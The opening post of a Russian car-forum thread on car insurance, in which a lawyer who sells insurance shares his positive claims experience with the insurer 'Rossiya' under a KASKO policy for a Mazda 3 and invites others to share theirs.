+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 18

Тема: Страхование: какой у кого опыт?


  1. #1
    GTI-Racing PhotoN is on a distinguished road Аватар для PhotoN
    Регистрация
    15.07.2008
    Машина
    Goда Plus TSI
    Сообщений
    1

    Exclamation Страхование: какой у кого опыт?

    В разделе несколько тем, касающиеся прав, но нет ничего о страховании. Предлагаю делиться опытом в этой теме.

    Представлюсь: Меня зовут Илья. Я юрист. Сейчас страхование - один из источников моего дохода. Я могу помочь разораться в вопросах, которые могут быть непонятны многим людям, от страхования и/или юриспруденции далеким. Естественно, я могу не только проконсультировать по вопросам страхования, но так же предложить варианты страхования и все оформить, но об этом удобней говорить лично или в другой теме, а в этой предлагаю делиться опытом страхования в разных компаниях. Начну с себя.

    2 года назад я страховался по КАСКО в Москве в СК "Россия". Условия страхования меня устроили на 100%, цена - самая адекватная на тот момент. Машина была Mazda 3. Никогда ничего хорошего от людей потом не слышал об этой СК: все, кто были ее клиентами, говорили, что я сделал выбор неверный, попал. И тем не менее, на моем опыте никаких проблем в течение срока действия полиса у меня не было. Несколько страховых случаев = несколько направлений на ремонт. Удобная процедура оформления случаев: прямо в сервисном центре Mazda или у нескольких брокеров (это кроме самой СК) пишу заявление, отдаю первичную справку и больше ничего не требуется; через несколько дней звонят из сервиса, сообщают, что направление на ремонт получено. Единственная проблема с ними была после окончания срока действия полиса. О страховом случае я заявил вовремя, но они протянули время, и искали повода для отказа потом. Будучи юристом, я их легко убедил в своей правоте по e-mail в течение 3 дней.